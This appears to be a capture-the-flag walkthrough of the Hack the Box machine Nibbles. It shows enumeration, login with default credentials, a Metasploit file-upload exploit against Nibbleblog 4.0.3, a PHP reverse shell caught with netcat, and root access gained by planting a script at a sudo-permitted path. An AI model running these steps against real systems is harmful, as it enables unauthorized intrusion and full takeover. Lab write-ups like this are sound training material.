Hack the Box: Nibbles

Enumeration

Nmap

The Nmap scan shows that OpenSSH is running on port 22 and an Apache HTTP server on port 80 on the target.

nmap -sVC -T4 -p- 10.10.10.75

HTTP

Browsing the website, we can see the text “Hello world!”.

Viewing the source of index.html reveals a comment referencing a /nibbleblog/ directory.

The page http://10.10.10.75/nibbleblog/ does not provide anything interesting.

Gobuster

Gobuster found among other things directories content and admin, and an admin.php file in the nibbleblog directory.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 10.10.10.75/nibbleblog -x php

From /nibbleblog/content/private/users.xml we can see a username admin.

At http://10.10.10.75/nibbleblog/admin.php we can see an admin login page.

Successfully logged in with credentials admin:nibbles.

From the admin settings, we can see that the Nibbleblog version is 4.0.3.

Exploitation

Metasploit

From SearchSploit we can see that there is a Nibbleblog 4.0.3 – Arbitrary File Upload Metasploit module.

searchsploit nibbleblog

Fired up Metasploit, used the exploit, and set the required arguments.

msfconsole
use exploit/multi/http/nibbleblog_file_upload
set rhosts 10.10.10.75
set username admin
set password nibbles
set targeturi /nibbleblog
set lhost tun0
run

Gained a Meterpreter session as a user nibbler.

The user flag can be obtained from the directory: /home/nibbler.

Privilege Escalation

Switched to a bash shell and executed the command sudo -l. We can see that the user nibbler can run a bash script /home/nibbler/personal/stuff/monitor.sh as a sudo.

shell
/bin/bash -i
sudo -l

At the directory /home/nibbler there is a zip file called personal.zip but no directory called “personal”. Unzipping the file personal.zip creates a directory personal/stuff and inflates personal/stuff/monitor.sh, which is a Linux server health monitoring script.

Because the file /home/nibbler/personal/stuff/monitor.sh does not exist, we can create a simple bash script in its place to achieve root access.

First, we make a directory /home/nibbler/personal/stuff.

cd /home/nibbler
mkdir personal && cd personal
mkdir stuff && cd stuff

Successfully gained a root shell after making the script and executing it.

echo "bash -i" > monitor.sh
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh

The root flag can be obtained from the directory: /root.

Exploitation without Metasploit

Examining the Metasploit exploit code, we can see that the exploit uploads the payload to the admin.php – plugins – config – my image.

At http://10.10.10.75/nibbleblog/admin.php we go to Plugins, My image and click Configure.

We then upload a PHP reverse shell file, which contains the IP address of the Kali Linux machine and port 443.

Started up a Netcat listener on the Kali Linux machine.

nc -lvnp 443

Loaded the URL: 10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

curl 10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

On the Netcat listener successfully gained a shell to the target.